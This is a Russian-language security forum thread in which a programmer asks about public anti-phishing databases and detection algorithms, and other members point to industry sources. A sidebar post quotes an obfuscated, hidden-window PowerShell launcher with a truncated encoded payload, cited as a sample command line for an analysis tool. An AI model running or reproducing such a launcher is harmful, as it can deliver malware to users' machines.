Перейти к содержанию

Recommended Posts

Storm

Здравствуйте, уважаемые форумчане!

Меня как программиста интересует борьба с фишингом.

Есть ли какие-то общедоступные анти-фишинговые базы или алгоритмы?

Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты
Сергей Ильин

Самая большая база по фишингу, насколько я знаю, сейчас у Anti-Phishing Working Group http://www.antiphishing.org/. В эту рабочую группу сейчас входят все значимые игроки рынка информационной безопасности.

Еще они дают статистику по фишингу, например такую:

mar06_total_phish.jpg

mar06_mal_apps.jpg

Добавлено спустя 4 минуты:

Доступ к безе правда Anti-Phishing Working Group дает только своим членам, просто так ее не получить.

Еще большая база есть у Netcraft, они не так давно начали заниматься антифишингом, выпустив свой toolbar для IE

http://news.netcraft.com/archives/2005/04/..._available.html

Можно связяться с этим комьюнити, может с ними удастся договориться.

Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты
Storm
Доступ к безе правда Anti-Phishing Working Group дает только своим членам, просто так ее не получить.

То-то и оно! Я знаю про эту базу, поэтому и спрашиваю, если есть free базы. Кроме того ИМХО анти-фишинг - это не сигнатурный продукт. Фишинг сайт обычно живут недолго. Здесь именно алгоритм.

Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты
Кирилл Керценбаум

Небольшая открытая информация есть у Trend Micro:

http://www.trendmicro.com/en/security/phishing/overview.htm

Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты
romank

Еще есть информация у WebSense

http://www.websensesecuritylabs.com/alerts/

http://www.websensesecuritylabs.com/charts/threatmap.php

Мне неизвестны эффективные алгоритмы борьбы с фишингом. Были всякие попытки написания эвристик, например случаи замены адреса в браузере, и большое количество внешних ссылок на баннеры. Все они были либо ошибочны, либо брали очень узкий круг сайтво фишинга.

Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты

  • Сообщения

    • PR55.RP55
      Допустим: '%WINDIR%\syswow64\cmd.exe' /c powershell -nop -exec bypass -win Hidden -noni -enc aQBmACgAWwBJAG4AdABQAHQAcgBdADoAOgBTAGkAegBlACAALQBlAHEAIAA0ACkAewAkAGIAPQAnAHAAbwB3AGUAcgBzAGgAZQBsAGwALgBlAHgAZQAnAH0AZQBsAHMAZQB7ACQAYg... '<SYSTEM32>\rundll32.exe' <SYSTEM32>\FirewallControlPanel.dll,ShowNotificationDialog /configure /ETOnly 0 /OnProfiles 6 /OtherAllowed 0 /OtherBlocked 0 /OtherEdgeAllowed 0 /NewBlocked 4 "%WINDIR%\syswow64\windowspowersh... Было бы неплохо, если бы в Инфо. объекта. Прописывались данные по настройке  разрешений Firewall. + Отдельная категория по Firewall - что разрешено, что заблокировано.
    • SQx
    • SQx
      Спасибо,  как раз появился новый случай.
        DhcpDomain REG_SZ domain.name DhcpNameServer REG_SZ 192.168.1.1  
    • demkd
      ---------------------------------------------------------
       4.11.9
      ---------------------------------------------------------
       o Твик #39 теперь дополнительно включает отслеживание командных строк завершенных процессов, командные строки отображаются в окне информации.
         Только для Windows 8.1/Windows Server 2012 R2 и старше.  o WLBSCTRL.DLL теперь автоматически получает статус подозрительного файла.  o В окне информации сетевого адаптера (в разделе DNS) теперь отображается поле DHCP Domain при его наличии.  
    • PR55.RP55
      https://habr.com/ru/post/214953/ На подобное событие антивирус также может реагировать - если сервер будет в чёрном списке. Да и уязвимости...  
×